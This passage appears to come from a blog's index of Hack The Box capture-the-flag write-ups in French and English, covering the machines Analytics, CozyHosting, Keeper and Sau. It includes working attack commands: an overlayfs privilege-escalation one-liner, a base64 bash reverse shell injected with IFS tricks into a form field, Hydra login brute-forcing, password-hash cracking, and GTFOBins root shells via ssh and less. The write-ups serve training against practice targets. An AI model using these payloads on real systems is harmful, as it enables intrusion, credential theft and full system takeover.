NFS export feature (bool) parm: xino_auto:Auto enable xino feature (bool) parm: metacopy:Default to on or off for the metadata only copy up feature (bool) metalytics@analytics:~$ mount | grep overlay overlay on /var/lib/docker/overlay2/a7f6f5739f75f1e4bb96947354c287e8832cbd56e9413c7eb57975b922c7ae7c/merged type overlay 
(rw,relatime,lowerdir=/var/lib/docker/overlay2/l/BC2SP2TYPJ5O4YFC453ADZ5EKX:/var/lib/docker/overlay2/l/XW5JTCT2MPEXHQG7MOTAI2T4KP:/var/lib/docker/overlay2/l/NFDWLGW3V3JHKDMCSIVCIGFRMU:/var/lib/docker/overlay2/l/MW4MXSGOUKAHBMLEMZ4WR4K7P2:/var/lib/docker/overlay2/l/AT6LTLZWU4G7MV5NOTUEB7AR4N:/var/lib/docker/overlay2/l/E6VXP5EJLZW24GE2AHMELF7FTD:/var/lib/docker/overlay2/l/3BARVZES6SW2GPRYNNYXZNM63J:/var/lib/docker/overlay2/l/JMBR2L6LC7K3O6CZHA24AF2CYR:/var/lib/docker/overlay2/l/PMQWGTOJEKRSOK2OV65KQJBDQY:/var/lib/docker/overlay2/l/L7Y5QRKKSPELNF2AUJ55RR2MV5:/var/lib/docker/overlay2/l/RO73TCQC6F7YHICLAOSVCCNSQ6,upperdir=/var/lib/docker/overlay2/a7f6f5739f75f1e4bb96947354c287e8832cbd56e9413c7eb57975b922c7ae7c/diff,workdir=/var/lib/docker/overlay2/a7f6f5739f75f1e4bb96947354c287e8832cbd56e9413c7eb57975b922c7ae7c/work) On a pu en conclure que la machine était bien vulnérable et on a executé le payload expliqué dans l\u0026rsquo;article.\n1 2 3 4 5 metalytics@analytics:~$ unshare -rm sh -c \u0026#34;mkdir l u w m \u0026amp;\u0026amp; cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m \u0026amp;\u0026amp; touch m/*;\u0026#34; \u0026amp;\u0026amp; u/python3 -c \u0026#39;import os;os.setuid(0);os.system(\u0026#34;/bin/bash\u0026#34;)\u0026#39; root@analytics:~# cd /root root@analytics:/root# cat root.txt f241.....692e ","date":"2023-12-30T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/analytics-htb/","title":"HTB | Analytics"},{"content":" Machine name OS IP Difficulty CozyHosting Linux 10.10.11.230 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 ┌──(kali㉿kali)-[~] └─$ sudo nmap -sV -sC -A -n -p- 10.10.11.230 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA) |_ 256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to 
http://cozyhosting.htb |_http-server-header: nginx/1.18.0 (Ubuntu) /etc/hosts : cozyhosting.htb Quand on tape l\u0026rsquo;ip dans firefox, ca nous redirige directement vers le nom de domaine : cozyhosting.htb\n1 2 3 ## Dans /etc/hosts ## ... 10.10.11.230 cozyhosting.htb hydra : port 80 Le brute force n\u0026rsquo;a pas fonctionné\u0026hellip;\n1 2 3 sudo hydra -l info@cozyhosting.htb -P /usr/share/wordlists/rockyou.txt cozyhosting.htb http-post-form \u0026#34;/login:username=^USER^\u0026amp;password=^PASS^:Invalid username or password\u0026#34; -I sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt cozyhosting.htb http-post-form \u0026#34;/login:username=^USER^\u0026amp;password=^PASS^:Invalid username or password\u0026#34; -I dirbuster, gobuster, dirsearch On a essayé de trouver un dossier à l\u0026rsquo;aide de dirbuster, mais il n\u0026rsquo;y avait rien de concluant.\nCependant, avec l\u0026rsquo;outil dirsearch (qui fait la meme chose que dirbuster et gobuster), on a pu voir qu\u0026rsquo;un dossier actuator était accessible. C\u0026rsquo;est parce que ce mot clée était présent dans la liste utilisé\u0026amp; par défaut pas dirsearch qu\u0026rsquo;on a pu trouver. Il aurait donc suffit de dirbuster/gobuster, ce mot n\u0026rsquo;était jsute pas présent dans la liste que j\u0026rsquo;utilisais. Voici le lien github pour dirsearch :\nhttps://github.com/maurosoria/dirsearch\nLe dossier trouvé intéressant est actuator.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ┌──(kali㉿kali)-[~/github/dirsearch] └─$ python3 dirsearch.py -u http://cozyhosting.htb _|. 
_ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11715 Output: /home/kali/github/dirsearch/reports/http_cozyhosting.htb/_23-12-29_17-56-26.txt Target: http://cozyhosting.htb/ [17:56:26] Starting: [17:56:45] 200 - 0B - /;/admin [17:56:45] 200 - 0B - /;/json [17:56:45] 200 - 0B - /;/login [17:56:45] 200 - 0B - /;admin/ [17:56:45] 200 - 0B - /;login/ [17:56:45] 400 - 435B - /\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd [17:56:45] 200 - 0B - /;json/ [17:56:47] 400 - 435B - /a%5c.aspx [17:56:49] 200 - 0B - /actuator/;/auditLog [17:56:49] 200 - 0B - /actuator/;/beans [17:56:49] 200 - 634B - /actuator [17:56:49] 200 - 0B - /actuator/;/auditevents [17:56:49] 200 - 0B - /actuator/;/caches [17:56:49] 200 - 0B - /actuator/;/conditions [17:56:49] 200 - 0B - /actuator/;/configurationMetadata [17:56:49] 200 - 0B - /actuator/;/exportRegisteredServices ... ... [17:57:38] 200 - 0B - /extjs/resources//charts.swf [17:57:45] 200 - 0B - /html/js/misc/swfupload//swfupload.swf [17:57:51] 200 - 0B - /jkstatus; [17:57:55] 200 - 4KB - /login [17:57:55] 200 - 0B - /login.wdm%2e [17:57:56] 204 - 0B - /logout Task Completed Foothold Session Cookie : kanderson user En allant sur le lien, on a pu découvrir un autre lien: http://cozyhosting.htb/actuator/sessions\nIl semblait contenir des cookies de sessions, donc celui d\u0026rsquo;un utilisateur kanderson.\nBurp : Admin Page En utilisant Burp, on pu envoyer une requête pour demander la page /admin puis la modifier à la volée pour écraser le cookie de session par celui trouvé précédemment. Et Bingo ! On arrive bien sur la page admin en tant que kanderson.\nOn peut également modifier le cookie de session directement dans l\u0026rsquo;outil de developpement du navigateur, ici firefox :\nOn observe un formulaire de type POST avec deux paramètres. 
Si on rentre un hostname puis pas de username, une erreur s\u0026rsquo;affiche indiquant que les parametres de ssh ne sont pas bon. Une injection de code semble possible !\nReverse Shell Sur la machine hote, on prepare un reverse shell comme on va pouvoir envoyer dans burp à la machine cible. On le convertie en base64\n1 2 3 ┌──(kali㉿kali)-[~] └─$ echo \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.25/44444 0\u0026gt;\u0026amp;1\u0026#34; | base64 -w 0 YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS80NDQ0NCAwPiYxCg== 1 2 3 4 5 ## On execute une commande pour decoder le payload en base64 puis on appel \u0026#34;bash\u0026#34; pour executer le payload ;echo${IFS%??}\u0026#34;YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS80NDQ0NCAwPiYxCg==\u0026#34;${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash; ## URL encoded : %3Becho%24%7BIFS%25%3F%3F%7D%22YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4xMjUvNDQ0NDQgMD4mMQo%3D%22%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbase64%24%7BIFS%25%3F%3F%7D-d%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbash%3B On envoie dans Burp en passant le payload dans une variable du formulaire POST :\nSur la machine hôte, on attend avec nc sur le port 44444\n1 2 3 4 python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; export TERM=xterm Ctrl+Z stty raw -echo; fg 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(kali㉿kali)-[~] └─$ nc -lvp 44444 listening on [any] 44444 ... 
connect to [10.10.14.125] from cozyhosting.htb [10.10.11.230] 39782\nbash: cannot set terminal process group (1063): Inappropriate ioctl for device\nbash: no job control in this shell\napp@cozyhosting:/app$ python3 -c 'import pty;pty.spawn(\"/bin/bash\")'\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\napp@cozyhosting:/app$ export TERM=xterm\nexport TERM=xterm\napp@cozyhosting:/app$ ^Z\nzsh: suspended  nc -lvp 44444\n┌──(kali㉿kali)-[~]\n└─$ stty raw -echo; fg\n[1]  + continued  nc -lvp 44444\napp@cozyhosting:/app$ python -m http.server 4444\nWe find an interesting .jar file on the machine.\nPSQL database credentials\nHere is what we found in a configuration file inside the jar:\nserver.address=127.0.0.1\nserver.servlet.session.timeout=5m\nmanagement.endpoints.web.exposure.include=health,beans,env,sessions,mappings\nmanagement.endpoint.sessions.enabled = true\nspring.datasource.driver-class-name=org.postgresql.Driver\nspring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect\nspring.jpa.hibernate.ddl-auto=none\nspring.jpa.database=POSTGRESQL\nspring.datasource.platform=postgres\nspring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting\nspring.datasource.username=postgres\nspring.datasource.password=Vg&nvzAQ7XxR\nWe tried connecting with these credentials and it worked!\napp@cozyhosting:/app$ psql -U postgres -h localhost -p 5432 -d cozyhosting\nPassword for user postgres:\npsql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))\nSSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)\nType \"help\" for help.
cozyhosting=#\nUsers table: hashes\nDigging through the database, we found the users table, which holds password hashes.\ncozyhosting=# \\dt\ncozyhosting=# select * from users;\n-----------------------------------------\nkanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User\nadmin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin\njohn: cracking the admin password\nWe then managed to crack the admin user's password hash:\n┌──(kali㉿kali)-[~/Hacking/HackTheBox/Machines/CozyHosting]\n└─$ john --wordlist=/usr/share/wordlists/rockyou.txt admin_hash.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (bcrypt [Blowfish 32/64 X3])\nCost 1 (iteration count) is 1024 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nmanchesterunited (?)\n1g 0:00:00:34 DONE (2023-12-29 19:57) 0.02868g/s 80.55p/s 80.55c/s 80.55C/s dougie..keyboard\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed.\nSo the admin password is manchesterunited.\nSSH josh: user flag\nEarlier we had been able to read /etc/passwd, where we found a username, josh. It could also be found by browsing /home.
Since this user has the administrator role, the password should also work over ssh:\n┌──(kali㉿kali)-[~/Hacking/HackTheBox/Machines/CozyHosting]\n└─$ ssh josh@10.10.11.230\njosh@10.10.11.230's password:\nWelcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)\n * Documentation:  https://help.ubuntu.com\n * Management:     https://landscape.canonical.com\n * Support:        https://ubuntu.com/advantage\n  System information as of Sat Dec 30 01:01:53 AM UTC 2023\n  System load:           0.0068359375\n  Usage of /:            59.8% of 5.42GB\n  Memory usage:          48%\n  Swap usage:            0%\n  Processes:             262\n  Users logged in:       0\n  IPv4 address for eth0: 10.10.11.230\n  IPv6 address for eth0: dead:beef::250:56ff:feb9:2531\nExpanded Security Maintenance for Applications is not enabled.\n0 updates can be applied immediately.\nEnable ESM Apps to receive additional future security updates.\nSee https://ubuntu.com/esm or run: sudo pro status\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\nFailed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings\nLast login: Fri Dec 29 19:20:45 2023 from 10.10.14.94\njosh@cozyhosting:~$ cat user.txt\ndb25.....2400\nPrivilege Escalation\njosh: SSH as root\nWe observe that josh is allowed to run /usr/bin/ssh with any arguments as root.\njosh@cozyhosting:~$ sudo -l\n[sudo] password for josh:\nMatching Defaults entries for josh on localhost:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty\nUser josh may run the following commands on localhost:\n    (root) /usr/bin/ssh *\nThe following site explains how to obtain an interactive shell starting from another command.
For example, for the ssh command: https://gtfobins.github.io/gtfobins/ssh/\nFor ssh, it lists three potential ways of getting a shell.\n## 1st command\n## This one did not work because it asks for the root password\njosh@cozyhosting:~$ sudo /usr/bin/ssh localhost $SHELL --noprofile --norc\nroot@localhost password:\nPermission denied, please try again.\nroot@localhost password:\nPermission denied, please try again.\nroot@localhost password:\nroot@localhost: Permission denied (publickey,password).\n## 2nd command\n## This one works!! We are root without needing the password!\njosh@cozyhosting:~$ sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x\n$ whoami\nroot\n$ ls\nuser.txt  usr\n$ cd /root\n$ ls\nroot.txt\n$ cat root.txt\n9ab6.....ba3d5\n","date":"2023-12-30T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/","title":"HTB | CozyHosting"},{"content":"Machine name: Keeper | OS: Linux | IP: 10.10.11.227 | Difficulty: Easy\nEnumeration\nnmap\n┌──(kali㉿kali)-[~]\n└─$ sudo nmap -sV -sC -A -n -p- 10.10.11.227\nPORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n|   256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)\n|_  256 1ae972be8bb105d5effedd80d8efc066 (ED25519)\n80/tcp open  http    nginx 1.18.0 (Ubuntu)\n|_http-title: Site doesn't have a title (text/html).\n|_http-server-header: nginx/1.18.0 (Ubuntu)\nWebsite: tickets.keeper.htb\nWe observe that port 80 is open.
Opening it in Firefox, we see a sentence pointing to a link:\nTo raise an IT support ticket, please visit tickets.keeper.htb/rt/\nTo reach that link, the target's IP has to be mapped to this domain name in the /etc/hosts file.\n/etc/hosts\n## Add the following line\n10.10.11.227 keeper.htb tickets.keeper.htb\nFoothold\nLogin page: default credentials\nGoing to http://tickets.keeper.htb/rt/ we land on a user/password login page. Trying a few default user/password pairs, we find: root/password\nSearching online for the default credentials of Request Tracker turns up the following sentence: The original (default) RT root user password is \"password\"\nHydra: brute-forcing the login page\nsudo hydra -l,-L <Username/List> -p,-P <Password/List> <IP or domain name> <Method> \"<Path>:<RequestBody>:<IncorrectVerbiage>\"\n## In our case\nsudo hydra -l root -P /usr/share/wordlists/rockyou.txt tickets.keeper.htb http-post-form \"/rt/NoAuth/Login.html:user=^USER^&pass=^PASS^&next=b9a09132c611f3dce07e77d9fde8ffde:Your username or password is incorrect\"\n## Result\nHydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-28 19:08:49\n[WARNING] Restorefile (ignored ...)
from a previous session found, to prevent overwriting, ./hydra.restore\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task\n[DATA] attacking http-post-form://tickets.keeper.htb:80/rt/NoAuth/Login.html:user=^USER^&pass=^PASS^&next=b9a09132c611f3dce07e77d9fde8ffde:Your username or password is incorrect\n[80][http-post-form] host: tickets.keeper.htb   login: root   password: password\n1 of 1 target successfully completed, 1 valid password found\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-28 19:09:00\nHydra confirms root/password by brute-forcing the POST form.\nPassword leak for user lnorgaard\nBrowsing the site's administration pages as root, we were able to list the users with administrator rights. One of them has the username lnorgaard.\nClicking the username opens a profile page, where the following description can be read:\nNew user. Initial password set to Welcome2023!\nWe were then able to log in over SSH with this user and password:\n┌──(kali㉿kali)-[~]\n└─$ ssh lnorgaard@10.10.11.227\nlnorgaard@10.10.11.227's password: Welcome2023!\nWelcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)\n * Documentation:  https://help.ubuntu.com\n * Management:     https://landscape.canonical.com\n * Support:        https://ubuntu.com/advantage\nFailed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings\nYou have mail.
Last login: Fri Dec 29 00:17:45 2023 from 10.10.16.58\nlnorgaard@keeper:~$ whoami\nlnorgaard\nlnorgaard@keeper:~$ ls\nKeePassDumpFull.dmp  passcodes.kdbx  poc.py  RT30000.zip  user.txt\nlnorgaard@keeper:~$ cat user.txt\n41f1.....d10c\nPrivilege escalation\npasscodes.kdbx: SSH to root\nA dump file of a KeePass database password is available in lnorgaard's home directory, next to the database itself, passcodes.kdbx. A vulnerability found online allows the password to be recovered from this dump. Running a Python script against the dump file yields the password of the KeePass database:\nrødgrød med fløde\nOpening the database in KeePass with this key reveals an SSH password: root: F4><3K0nd!\nThere is also a note that appears to contain a public and a private key, which matters for connecting to root over ssh. The file seems to have been generated by PuTTY.\nPuTTY-User-Key-File-3: ssh-rsa\nEncryption: none\nComment: rsa-key-20230519\nPublic-Lines: 6\n(public key lines omitted)\nPrivate-Lines: 14\n(private key lines omitted)\nPrivate-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0\nSearching online, we find that the keys can be converted to OpenSSH format so that we can then connect over ssh easily. Here are the commands to generate the keys:\n## generate the public key\n$ puttygen key.ppk -O public-openssh\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81TEHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LMCj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1TuFVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQLxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et rsa-key-20230519\n## generate the private key\n$ puttygen key.ppk -O private-openssh\nputtygen: need to specify an output file\n$ puttygen key.ppk -O private-openssh -o rsa_id\n$ cat rsa_id\n-----BEGIN RSA PRIVATE KEY-----\n(private key lines omitted)\n-----END RSA PRIVATE KEY-----\nI then copied it to the Kali box and onto the target machine (not strictly necessary) with scp:\n## I copied it by hand to the VM by opening a file with vim\nlnorgaard@keeper:~$ vim rsa_id\n## Attempting to ssh to root\nlnorgaard@keeper:~$ ssh root@keeper.htb -i rsa_id\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\nPermissions 0664 for 'rsa_id' are too open.\nIt is required that your private key files are NOT accessible by others.\nThis private key will be ignored.
Load key \"rsa_id\": bad permissions\nroot@keeper.htb's password:\nlnorgaard@keeper:~$ chmod 600 rsa_id\n## Attempting to ssh to root\nlnorgaard@keeper:~$ ssh root@keeper.htb -i rsa_id\nWelcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)\n * Documentation:  https://help.ubuntu.com\n * Management:     https://landscape.canonical.com\n * Support:        https://ubuntu.com/advantage\nFailed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings\nYou have new mail.\nLast login: Fri Dec 29 00:08:39 2023 from 10.10.14.156\nroot@keeper:~# whoami\nroot\nroot@keeper:~# ls\nroot.txt  RT30000.zip  SQL\nroot@keeper:~# cat root.txt\nbe35.....f853\n","date":"2023-12-29T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/keeper-htb/","title":"HTB | Keeper"},{"content":"Machine name: Sau | OS: Linux | IP: 10.10.11.224 | Difficulty: Easy\nEnumeration\nnmap\n┌──(kali㉿kali)-[~]\n└─$ sudo nmap -sV -sC 10.10.11.224 -A -n\nPORT      STATE    SERVICE VERSION\n22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)\n|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)\n|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)\n80/tcp    filtered http\n55555/tcp open     unknown\n| fingerprint-strings:\n|   FourOhFourRequest:\n|     HTTP/1.0 400 Bad Request\n|     Content-Type: text/plain; charset=utf-8\n|     X-Content-Type-Options: nosniff\n|     Date: Wed, 27 Dec 2023 23:03:42 GMT\n|     Content-Length: 75\n|     invalid basket name; the name does not match pattern: ^[wd-_\\.]{1,250}$\n|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:\n|     HTTP/1.1 400 Bad Request\n|     Content-Type: text/plain; charset=utf-8\n|     Connection: close\n|     Request\n|   GetRequest:\n|     HTTP/1.0 302 Found\n|     Content-Type: text/html;
charset=utf-8\n|     Location: /web\n|     Date: Wed, 27 Dec 2023 23:03:16 GMT\n|     Content-Length: 27\n|     href=\"/web\">Found</a>.\n|   HTTPOptions:\n|     HTTP/1.0 200 OK\n|     Allow: GET, OPTIONS\n|     Date: Wed, 27 Dec 2023 23:03:16 GMT\n|_    Content-Length: 0\nFoothold\nExploitation: request-baskets\nI found a CVE online and exploited it.\nExploitation: Maltrail\n┌──(kali㉿kali)-[~/HTB/Sau/maltrail-exploit/Maltrail-v0.53-Exploit]\n└─$ python3 exploit.py 10.10.14.160 55555 http://10.10.11.224:55555/pleffy\nRunning exploit on http://10.10.11.224:55555/pleffy/login\nReverse Shell\nOpen a reverse shell: listen with nc at the same time as launching exploit.py.\n┌──(kali㉿kali)-[~]\n└─$ sudo nc -lvp 55555\n[sudo] Mot de passe de kali :\nlistening on [any] 55555 ...\n10.10.11.224: inverse host lookup failed: Unknown host\nconnect to [10.10.14.160] from (UNKNOWN) [10.10.11.224] 50528\n$ ls\nls\nCHANGELOG     core    maltrail-sensor.service  plugins           thirdparty\nCITATION.cff  docker  maltrail-server.service  requirements.txt  trails\nLICENSE       h       maltrail.conf            sensor.py\nREADME.md     html    misc                     server.py\n$ whoami\nwhoami\npuma\nOpen a Python-spawned bash\n$ python3 -c 'import pty;pty.spawn(\"/bin/bash\")'\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\npuma@sau:~$ whoami\nwhoami\npuma\nUser flag\npuma@sau:~$ ls\nls\nlinpeas.sh  systemctl  u  user.txt\npuma@sau:~$ cat user*\ncat user*\nd302.....b9f0\nPrivilege Escalation\nEnumeration\n$ sudo -l\nsudo -l\nMatching Defaults entries for puma on sau:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\nUser puma may run the following commands on sau:\n    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service\nWe can see that puma may run this command as root:\nsudo /usr/bin/systemctl status trail.service\nsystemctl status trail.service\nWhen we run it, we notice that the command pages its output through less. If less runs as root, it can spawn a shell as root. I found this information on the following site:\nhttps://gtfobins.github.io/gtfobins/less/\nFor example, inside less we can type: !/bin/sh\nSince less is running as root, this should launch a shell as root.\nExploit: less\n$ sudo /usr/bin/systemctl status trail.service\nsudo /usr/bin/systemctl status trail.service\nWARNING: terminal is not fully functional\n-  (press RETURN)!/bin/sh\n!//bbiinn//sshh!/bin/sh\n# whoami\nwhoami\nroot\n# cd /root\ncd /root\n# ls\nls\ngo  root.txt\n# cat roo*\ncat roo*\n047d.....6de3\n","date":"2023-12-28T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/sau-htb/","title":"HTB | Sau"}]